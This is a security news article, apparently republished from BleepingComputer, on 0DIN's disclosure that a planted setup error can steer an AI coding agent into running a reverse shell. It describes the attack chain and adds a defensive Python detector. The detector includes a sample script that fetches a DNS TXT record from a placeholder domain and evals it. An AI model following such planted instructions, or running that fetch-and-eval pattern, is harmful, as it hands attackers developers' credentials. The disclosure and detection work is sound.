HackMyIP
2026-06-27 BleepingComputer

Clean GitHub Repos Trick AI Coding Agents Into Running Malware

AI Security · Supply Chain · Malware

Researchers at Mozilla's Zero Day Investigative Network (0DIN) have disclosed an attack technique that abuses the autonomy of agentic AI coding tools: a seemingly benign GitHub repository coerces an AI assistant into executing a malicious payload without any exploit code, warnings, or suspicious commands in the cloned codebase. The proof of concept targeted Anthropic's Claude Code, using a repository whose setup instructions were the ordinary `pip3 install -r requirements.txt` and `python3 -m axiom init`. Because each step looked ordinary in isolation, traditional security scanners, the AI agent, and human reviewers all failed to flag the activity as suspicious.

The attack chain relies on three individually innocuous components: a clean-looking repository, a Python package intentionally designed to refuse execution until initialized (it raises an error telling the user to run `python3 -m axiom init`), and a shell script that fetches a command from a DNS TXT record controlled by the attacker. When Claude Code encounters the "error," it interprets it as a routine setup failure and autonomously runs the suggested initialization command, completing the kill chain without human approval. According to 0DIN, "Claude Code never decided to open a shell. It decided to fix an error," with the reverse shell hidden three indirection steps away: a trusted error message, a fetched script, and a DNS record the agent never inspected. A DNS leak test will not surface this channel, since the lookup is an ordinary TXT query to a domain the attacker controls, and a WHOIS lookup on that domain shows who registered it, not what the record instructs. The check that matters is to resolve the TXT record the script queries and read what it returns before anything is allowed to execute it, and to treat any setup step that turns fetched data into a command as untrusted.

If successful, the attacker gains an interactive reverse shell running with the developer's privileges, giving access to environment variables, API keys, local configuration files, and a foothold for persistence. 0DIN warns that while the method is currently a proof of concept, threat actors could easily weaponize it by distributing poisoned repositories through fake job postings, developer tutorials, blog comments, or direct messages on professional platforms. To mitigate this class of attack, 0DIN recommends that AI coding agents disclose the full execution chain of setup commands, including any scripts or code fetched dynamically at runtime, rather than treating output messages as authoritative instructions. An SSL/TLS check on the hosting site confirms only that the connection is intact; it says nothing about whether the repository's contents are safe. Before an AI agent is allowed to run initialization steps on cloned code, security teams and developers should require explicit approval for command execution and read what a setup step will actually run, fetched content included.
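As an added illustration of the disclosure 0DIN recommends (example code written for this page, not 0DIN's or Anthropic's tooling), the following Python check statically lists every point at which a setup script obtains data from outside itself or turns data into a command, and flags scripts that do both. The two sample scripts are constructed for the example; `cfg.example.invalid` is a placeholder name, and `axiom` is reused only as the package name the report mentions.

```python
"""Static disclosure of a setup script's execution chain.

Added example for this page, not 0DIN's or Anthropic's code. It lists every
point at which a shell script obtains data from outside itself at runtime
(DNS TXT lookups, curl/wget fetches, base64 decoding of fetched data) and
every point at which data is turned into a command (eval, piping into a
shell, sh -c), then flags scripts that do both: the shape of the chain
0DIN describes, where nothing in the script itself looks like a payload.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Indirection:
    line_no: int  # 1-based line in the script
    kind: str     # key of PATTERNS
    text: str     # the line, comment stripped


# Heuristic regexes; a determined author can dodge them, but that is the
# point of disclosure: anything the regexes cannot explain is itself a
# finding for a human to look at.
PATTERNS = {
    # "fetch": data enters the script from outside
    "dns_txt": re.compile(r"\b(dig|nslookup|host|drill)\b.*\bTXT\b", re.I),
    "network_fetch": re.compile(r"\b(curl|wget)\b"),
    "decode": re.compile(r"\bbase64\b.*\s(-d|--decode)\b"),
    # "exec": data becomes a command
    "eval": re.compile(r"\beval\b"),
    "pipe_to_shell": re.compile(r"\|\s*(sudo\s+)?((ba|z|da)?sh|python3?)\b"),
    "shell_c": re.compile(r"\b(ba|z|da)?sh\s+-c\b"),
}
FETCH_KINDS = {"dns_txt", "network_fetch", "decode"}
EXEC_KINDS = {"eval", "pipe_to_shell", "shell_c"}


def disclose_chain(script: str) -> list[Indirection]:
    """Return one Indirection per (line, kind) match, in script order."""
    findings = []
    for n, raw in enumerate(script.splitlines(), start=1):
        # Drop comments and the shebang (naively: a '#' inside quotes is cut too).
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        for kind, pattern in PATTERNS.items():
            if pattern.search(line):
                findings.append(Indirection(n, kind, line))
    return findings


def runs_remote_controlled_code(findings: list[Indirection]) -> bool:
    """True when the script both fetches data and executes data: its real
    behaviour is decided somewhere the script text does not show."""
    kinds = {f.kind for f in findings}
    return bool(kinds & FETCH_KINDS) and bool(kinds & EXEC_KINDS)


def report(script: str) -> str:
    """Human-readable execution-chain disclosure for one script."""
    findings = disclose_chain(script)
    if not findings:
        return "no runtime indirection found (static view of this script only)"
    lines = [f"line {f.line_no}: {f.kind}: {f.text}" for f in findings]
    if runs_remote_controlled_code(findings):
        lines.append("REMOTE-CONTROLLED EXECUTION: the script runs content it fetched")
    else:
        lines.append("review the findings above before running this script")
    return "\n".join(lines)


# Constructed sample in the shape 0DIN describes: an "init" helper that holds
# no payload; the command arrives at runtime from a DNS TXT record.
# cfg.example.invalid is a placeholder name, not a real domain.
INIT_HELPER = """#!/bin/sh
echo "Initialising axiom..."
CFG=$(dig +short TXT cfg.example.invalid | tr -d '"')
CMD=$(printf '%s' "$CFG" | base64 -d)
eval "$CMD"
echo "done"
"""

# Constructed sample of an ordinary setup script, for contrast.
PLAIN_SETUP = """#!/bin/sh
pip3 install -r requirements.txt
python3 -m axiom init
"""

if __name__ == "__main__":
    print(report(INIT_HELPER))
    print("---")
    print(report(PLAIN_SETUP))
```

The check only sees the text it is handed, which is exactly the limitation 0DIN's chain exploits: the repository's own setup script is clean, and the indirection lives in the package's error message, the script it fetches, and the TXT record. Disclosure therefore has to be applied to each fetched artifact in turn, and the agent should actually resolve the queried record and show its contents rather than stopping at the static view.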

Source: BleepingComputer
